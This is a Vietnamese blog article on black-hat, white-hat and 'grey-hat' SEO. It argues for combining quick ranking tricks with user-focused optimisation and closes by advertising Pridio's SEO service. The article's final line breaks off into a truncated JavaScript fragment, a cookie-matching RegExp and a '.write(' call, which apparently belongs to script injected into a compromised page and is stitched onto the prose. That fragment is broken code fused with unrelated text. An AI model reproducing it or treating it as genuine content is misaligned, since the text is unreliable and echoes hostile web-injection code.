Seo Mũ Đen và Seo Mũ Trắng

Hai khái niệm này nghe qua chắc bạn sẽ đoán: Seo mũ đen là xấu, Seo mũ trắng là tốt. Vậy thực hư ra sao, mời các bạn cùng theo dõi bài viết:

Nhắc lại một chút về bản chất của Seo: “Làm SEO là tối ưu website của mình và tác động lên các trang web khác theo những thuật toán có ảnh hưởng lớn nhất đến kết quả tìm kiếm của Google”. Cấp độ 2 của bản chất: “Google luôn muốn kết quả tốt nhất cho người dùng, vì thế làm SEO là làm thế nào để mang lại kết quả tốt nhất cho người dùng.”

SEO mũ đen, mũ trắng là gì

  • Seo mũ đen: là việc dùng những thủ thuật, phần mềm với nỗ lực làm tăng thứ hạng Website, tuy nhiên những thủ thuật này Google không hề khuyến khích bởi chúng làm tăng lượng “rác” trên thế giới Internet, đôi khi những kết quả chưa thật sự tốt lại có được thứ hạng cao trong kết quả tìm kiếm.
  • Seo mũ trắng: là việc làm Seo hướng đến người dùng, nó không dừng lại ở những thủ thuật làm cho Website lên TOP mà còn là chiến lược Marketing.

SEO mũ nào tốt hơn

Nhiều người mải mê chạy theo những thủ thuật mà quên đi Seo chính là một phần của Search Engine Marketing, một nhánh của Cây Internet Marketing. Nếu nghĩ Seo là một chương trình Marketing cho doanh nghiệp, có thể tư duy của bạn sẽ khác, thậm chí phát hiện ra những cách lên TOP mà không cần dùng đến thủ thuật nào. Đơn giản như việc nghiên cứu từ khóa, hãy nhóm những từ khóa liên quan về mặt nội dung để xác định Landing Page hợp lý để giảm tỷ lệ Bounce Rate, tăng thời gian truy cập, tăng độ chuyển đổi. Làm Seo mũ trắng, bạn còn có cơ hội lên top với nhiều từ khóa liên quan:

230.310 từ khóa lên top!

Bạn lên top 1 và có 1 khách hàng mỗi ngày không bằng tôi top 5 từ khóa chính và một số từ khóa liên quan, có 10 khách hàng mỗi ngày. Như vậy Seo mũ trắng tốt hơn.

Ok, có thể bạn làm Seo rất cẩn thận, nhưng chỉ sau 1 tháng tôi làm Seo mũ đen đã top 5, còn bạn cứ mũ trắng để rồi 3,4 tháng rồi mới trang 2, trang 3. Tôi đã bắt đầu có khách hàng còn bạn vẫn đang trong thời gian đầu tư và chưa có mấy doanh thu. Như vậy Seo mũ đen tốt hơn.

Đệch… thế tóm lại là sao?

Seo mũ xám

Hãy là con quỷ Marketing, bên trong là sát thủ nhưng bề ngoài hiền lành, chất phác – đó chính là Seo mũ xám. Seo mũ trắng giúp bạn tối ưu cho người dùng, làm cho kết quả Seo bền vững, khó xuống Top. Seo mũ đen giúp bạn giảm bớt nhược điểm lớn nhất của Seo: Thời gian lâu! Bạn hãy kết hợp các thủ thuật và tối ưu cho người dùng để có được kết quả tốt nhất và nhanh nhất. Tuy nhiên, phải hướng đến Seo mũ trắng nhé.

Và tất nhiên, dịch vụ Seo của Pridio là mũ xám hướng trắng, haha! (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘